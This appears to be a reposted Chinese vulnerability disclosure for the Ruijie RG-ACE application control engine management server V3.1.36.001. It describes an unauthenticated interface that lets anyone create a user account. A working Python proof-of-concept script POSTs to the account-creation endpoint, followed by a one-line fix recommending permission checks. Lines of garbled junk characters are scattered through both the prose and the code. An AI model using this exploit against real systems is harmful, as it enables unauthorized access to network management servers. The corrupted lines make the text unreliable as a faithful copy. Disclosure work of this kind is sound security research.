锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）

  W, i1 j/ }. O- o4 K# Z4 ^
测试的具体版本是
4 a5 L3 m: z8 C8 ]( R产品名称: 锐捷应用控制引擎
' \, u1 Z" p  `7 i版本号: 3.1.36.001 TC
编译时间: 201104291730


: ~, p7 X; v8 p6 E% C7 o! N- u2 L0 ?漏洞证明：

, h: u4 O7 e) l% @

5 q7 m$ w# K% S6 p4 W$ {
! R# c8 m+ M1 b$ u

' G& w& ^2 s. H( b* c: _/ a4 S3 ]执行脚本
#! /usr/bin/env python
% y" s+ H* w9 e  {  ?! P1 k#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
( T3 i; A, Q2 u+ [* R( _url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
) \5 v$ r) e8 p& G; d3 Sopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
; C2 S* G0 D; A# M- s! @3 p# z("useropermanager","userManager"),
( q. }; M# {( s+ o/ ^("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
% |( u  v0 n$ L4 H0 y3 W2 C("trueName","ad"),
("email",""),
, U$ L! ?# q' o2 w! y! u("mobilePhone",""),
( h. v" J2 V1 A4 a("officePhone",""),
("addr",""),
1 f! K/ F! O% F/ X: e( t6 I% t  k("submit","确定"))
urllib2.install_opener(opener)
9 V- r1 y. V2 Yp=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

登录，连接设备
! n8 G6 f& A5 U2 ]$ V0 w




默认的管理员admin权限更大点
# N9 @- W  T! Q2 E0 x

4 y  ]% K; J0 H7 |2 K. I+ _' i5 o


  d% F0 J8 K+ E4 ]# W修复方案：
: |# d, ?+ p$ t加强对接口的权限验证
+ G7 s# ^5 m& J5 z, B% Z: G! l